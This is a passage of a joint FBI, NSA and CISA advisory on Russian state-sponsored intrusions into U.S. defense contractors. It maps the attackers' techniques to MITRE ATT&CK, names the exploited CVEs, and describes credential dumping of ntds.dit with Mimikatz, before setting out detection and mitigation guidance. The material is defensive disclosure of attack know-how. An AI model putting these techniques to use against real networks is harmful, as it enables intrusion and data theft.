policymakers of U.S. intentions, and target potential sources for recruitment. 
Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.\n\nFor additional information on Russian state-sponsored cyber activity, see CISA's webpage, [Russia Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/russia>).\n\n### Threat Details\n\n#### **Targeted Industries and Assessed Motive**\n\nRussian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020 through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.\n\nDuring this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company\u2019s products, relationships with other countries, and internal personnel and legal matters.\n\nThrough these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. 
Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.\n\n_Figure 1. Targeted Industries_\n\n_Figure 2. Exfiltrated Information_\n\n#### **Threat Actor Activity**\n\n_**Note:** This advisory uses the MITRE ATT&CK\u00ae for Enterprise framework, version 10. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors\u2019 activity mapped to MITRE ATT&CK tactics and techniques._\n\n##### _**Initial Access**_\n\nRussian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.\n\n * Threat actors use brute force techniques [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110>)] to identify valid account credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. 
_**Note:** For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)._\n * Threat actors send spearphishing emails with links to malicious domains [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)] and use publicly available URL shortening services to mask the link [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim\u2019s clicking on the link. \n * The threat actors use harvested credentials in conjunction with known vulnerabilities\u2014for example, CVE-2020-0688 and CVE-2020-17144\u2014on public-facing applications [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>), [T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[[1](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. \n * As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. 
This activity necessitates that CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\n\n##### _**Credential Access**_\n\nAfter gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database `ntds.dit` [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. \n\n##### _**Collection**_\n\nUsing compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [[T1213.002](<https://attack.mitre.org/versions/v10/techniques/T1213/002/>)], user profiles, and user emails [[T1114.002](<https://attack.mitre.org/versions/v10/techniques/T1114/002/>)].\n\n##### _**Command and Control**_\n\nThe threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)].\n\n##### _**Persistence**_\n\nIn multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. 
In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.\n\n#### **Tactics, Techniques, and Procedures**\n\nThe following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. _**Note:** for specific countermeasures related to each ATT&CK technique, see the [Enterprise Mitigations](<https://attack.mitre.org/mitigations/>) section and [MITRE D3FEND](<https://d3fend.mitre.org/>)\u2122._\n\n_Table 1: Observed Tactics, Techniques, and Procedures (TTPs)_\n\n
Tactic | Technique | Procedure \n---|---|--- \n**Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]**<br>**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]** | Gather Victim Identity Information: Credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)]<br>Brute Force [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110/003/>)] | Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]** | External Remote Services [[T1133](<https://attack.mitre.org/versions/v10/techniques/T1133>)] | Threat actors continue to research vulnerabilities in Fortinet\u2019s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [[2](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>)] \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**<br>**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]** | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]<br>Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)] | Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)\u2014CVE-2020-0688 and CVE-2020-17144\u2014to escalate privileges and gain remote code execution (RCE) on the exposed applications. [[3](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**<br>**Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005>)]** | Phishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)]<br>Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)] | Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**<br>**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]** | OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]<br>Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)] | Threat actors logged into a victim\u2019s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database `ntds.dit`. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**<br>**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**<br>**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]** | Valid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v10/techniques/T1078/004/>)]<br>Data from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v9/techniques/T1213/002/>)] | In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**<br>**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]** | Valid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]<br>Email Collection [[T1114](<https://attack.mitre.org/versions/v10/techniques/T1114>)] | In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system. \n**Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]**<br>**Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v10/tactics/TA0008>)]** | Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access. \n**Discovery [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]** | File and Network Discovery [[T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>)] | After gaining access to networks, the threat actors used BloodHound to map the Active Directory. \n**Discovery [[TA0007](<https://attack.mitre.org/versions/v10/tactics/TA0007>)]** | Domain Trust Discovery [[T1482](<https://attack.mitre.org/versions/v10/techniques/T1482/>)] | Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities. \n**Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]** | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target. \n\n
### Detection\n\nThe FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. 
_**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom._\n\n#### **Detect Unusual Activity**\n\n**Implement robust log collection and retention.** Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:\n\n * Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.\n * Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. _**Note:** for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)._\n\n#### **Look for Evidence of Known TTPs**\n\n * **Look for behavioral evidence or network and host-based artifacts** from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. 
\n * To detect use of compromised credentials in combination with a VPS, follow the steps below: \n   * **Review logs for suspicious \u201cimpossible logins,\u201d** such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n   * **Look for one IP used for multiple accounts,** excluding expected logins.\n   * **Search for \u201cimpossible travel,\u201d** which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). _**Note:** this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks._\n * **Evaluate processes and program execution command-line arguments** that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations. \n * **Review logs for unusual activity** in typically dormant accounts.\n * **Look for unusual user agent strings,** such as strings not typically associated with normal user activity, which may indicate bot activity.\n\n### Incident Response and Remediation\n\nOrganizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.\n\n * **Reset passwords for all local accounts.** These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. 
_**Note:** reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully in large AD environments. Refer to Microsoft\u2019s [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>) guidance and automation script for additional information. [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)][[5](<https://github.com/microsoft/New-KrbtgtKeys.ps1>)]_\n * **Reset all domain user, admin, and service account passwords.**\n\n_**Note:** for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report [Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a>). Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the [SolarWinds Orion supply chain compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>), the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors._\n\n### Mitigations\n\nThe FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate common malicious activity. 
\n\n#### **Implement Credential Hardening**\n\n##### **_Enable Multifactor Authentication_**\n\n * **Enable multifactor authentication (MFA)** for all users, without exception. Subsequent authentications may not require MFA, which makes it possible to bypass MFA by reusing single-factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions forces accounts to re-validate against their MFA requirements.[[6](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>)] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single-factor authentication assertions.[[7](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>)] \n\n##### **_Enforce Strong, Unique Passwords_**\n\n * **Require accounts to have strong, unique passwords.** Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n * **Enable password management functions**, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.\n\n##### **_Introduce Account Lockout and Time-Based Access Features_**\n\n * **Implement time-out and lock-out features** in response to repeated failed login attempts.\n * **Configure time-based access for accounts set at the admin level and higher.** For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). 
This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.\n\n##### **_Reduce Credential Exposure_**\n\n * **Use virtualization solutions on modern hardware and software** to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[[8](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>)] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[[9](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)][[10](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>)] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). 
Installation of Windows 11 requires TPM v2.0.[[11](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>)] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[[12](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>)][[13](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>)]\n\n#### **Establish Centralized Log Management**\n\n * **Create a centralized log management system.** Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. \n * Forward all logs to a SIEM tool.\n * Ensure logs are searchable.\n * Retain critical and historic network activity logs for a minimum of 180 days. \n * **If using M365, enable Unified Audit Log (UAL)**\u2014M365\u2019s logging capability\u2014which contains events from Exchange Online, SharePoint Online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services. \n * **Correlate logs, including M365 logs, from network and host security devices.** This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. \n\nIn addition to setting up centralized logging, organizations should:\n\n * **Ensure PowerShell logging is turned on.** Threat actors often use PowerShell to hide their malicious activities.[14] \n * **Update PowerShell instances to version 5.0 or later** and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. 
\n * **Confirm PowerShell 5.0 instances have module, script block, and transcription logging** enabled.\n * **Monitor remote access/Remote Desktop Protocol (RDP) logs** and disable unused remote access/RDP ports.\n\n#### **Initiate a Software and Patch Management Program**\n\n * **Consider using a centralized patch management system.** Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[[15](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>)] \n * If an organization is unable to update all software shortly after a patch is released, **prioritize patches for CVEs that are already known** to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). \n * **Subscribe to [CISA cybersecurity notifications and advisories](<https://us-cert.cisa.gov/ncas>)** to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. \n * **Sign up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)**, including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.\n\n#### **Employ Antivirus Programs**\n\n * **Ensure that antivirus applications are installed on all organizations\u2019 computers** and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. 
\n * **Keep virus definitions up to date.**\n * **Regularly monitor antivirus scans.**\n\n#### **Use Endpoint Detection and Response Tools**\n\n * **Utilize endpoint detection and response (EDR) tools.** These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. \n\n#### **Maintain Rigorous Configuration Management Programs**\n\n * **Audit configuration management programs** to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[[16](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>)] \n\n#### **Enforce the Principle of Least Privilege**\n\n * **Apply the principle of least privilege.** Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised. \n * **For M365, assign administrator roles using role-based access control (RBAC)** to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD\u2019s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. _**Note:** refer to the Microsoft documentation, [Azure AD built-in roles](<https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles>), for more information about Azure AD._\n * **Remove privileges not expressly required by an account\u2019s function or role.**
\n * **Ensure there are unique and distinct administrative accounts** for each set of administrative tasks. \n * **Create non-privileged accounts for privileged users,** and ensure they use the non-privileged accounts for all non-privileged access (e.g., web browsing, email access).\n * **Reduce the number of domain and enterprise administrator accounts,** and remove all accounts that are unnecessary.\n * **Regularly audit administrative user accounts.**\n * **Regularly audit logs to ensure new accounts are legitimate users.**\n * **Institute a group policy that disables remote interactive logins,** and use the Domain Protected Users Group.\n\nTo assist with identifying suspicious behavior with administrative accounts:\n\n * **Create privileged role tracking.**\n * **Create a change control process** for all privilege escalations and role changes on user accounts.\n * **Enable alerts on privilege escalations and role changes.**\n * **Log privileged user changes** in the network environment, and create an alert for unusual events.\n\n#### **Review Trust Relationships**\n\n * **Review existing trust relationships with IT service providers,** such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * **Remove unnecessary trust relationships.**\n * **Review contractual relationships** with all service providers, and ensure contracts include: \n   * Security controls the customer deems appropriate. 
\n   * Appropriate monitoring and logging of provider-managed customer systems.\n   * Appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n   * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n\n_**Note:** review CISA\u2019s page on [APTs Targeting IT Service Provider Customers](<https://www.cisa.gov/uscert/APTs-Targeting-IT-Service-Provider-Customers>) and [CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for additional recommendations for MSP and CSP customers._\n\n#### **Encourage Remote Work Environment Best Practices**\n\nWith the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices. _**Note:** for additional information, see joint NSA-CISA Cybersecurity Information Sheet: [Selecting and Hardening Remote Access VPN Solutions](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>)._\n\n * **Regularly update VPNs, network infrastructure devices, and devices used for remote work environments** with the latest software patches and security configurations.\n * **When possible, require MFA on all VPN connections.** Physical security tokens are the most secure form of MFA, followed by authenticator applications. 
When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.\n * **Monitor network traffic for unapproved and unexpected protocols.**\n * **Reduce potential attack surfaces by discontinuing unused VPN servers** that may be used as a point of entry by adversaries.\n\n#### **Establish User Awareness Best Practices**\n\nCyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:\n\n * **Provide end user awareness and training.** To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.\n * **Inform employees of the risks of social engineering attacks,** e.g., risks associated with posting detailed career information to social or professional networking sites.\n * **Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion** to help quickly and efficiently identify threats and employ mitigation strategies.\n\n#### **Apply Additional Best Practice Mitigations**\n\n * **Deny atypical inbound activity from known anonymization services,** including commercial VPN services and The Onion Router (Tor).\n * **Impose allowlisting policies for applications and remote access** that only allow systems to execute known and permitted programs under an established security policy.\n * **Identify and create offline backups for critical assets.**\n * **Implement network segmentation.**\n * **Review CISA Alert** [AA20-120A: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>) for additional recommendations on 
hardening M365 cloud environments.

### Rewards for Justice Program

If you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State’s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to [rewardsforjustice.net](<https://rewardsforjustice.net/terrorist-rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>).

### Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA.

### Contact Information

To report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>) or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:cywatch@fbi.gov>).
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:central@cisa.gov>). For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). Defense Industrial Base companies may additionally sign up for NSA’s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).

### Appendix: Detailed Tactics, Techniques, and Procedures

#### **Reconnaissance** [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]

Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [[T1589.001](<https://attack.mitre.org/techniques/T1589/001>)].[[17](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting.

#### **Initial Access** [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network.
For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[18](<https://attack.mitre.org/groups/G0007>)] These specific actors obtained and abused credentials of domain [[T1078.002](<https://attack.mitre.org/techniques/T1078/002>)] and cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)].[[19](<https://attack.mitre.org/software/S0154/>)] The actors also used external remote services to gain access to systems [[T1133](<https://attack.mitre.org/techniques/T1133>)].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [[T1190](<https://attack.mitre.org/techniques/T1190>)].[[21](<https://attack.mitre.org/groups/G0007>)] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [[T1566.002](<https://attack.mitre.org/techniques/T1566/002>)].[22]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access.
T1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.
T1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network.
T1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems.

#### **Persistence** [[TA0003](<https://attack.mitre.org/tactics/TA0003>)]

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[23](<https://attack.mitre.org/groups/G0007>)]

ID | Name | Description
---|---|---
T1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

#### **Privilege Escalation** [[TA0004](<https://attack.mitre.org/tactics/TA0004>)]

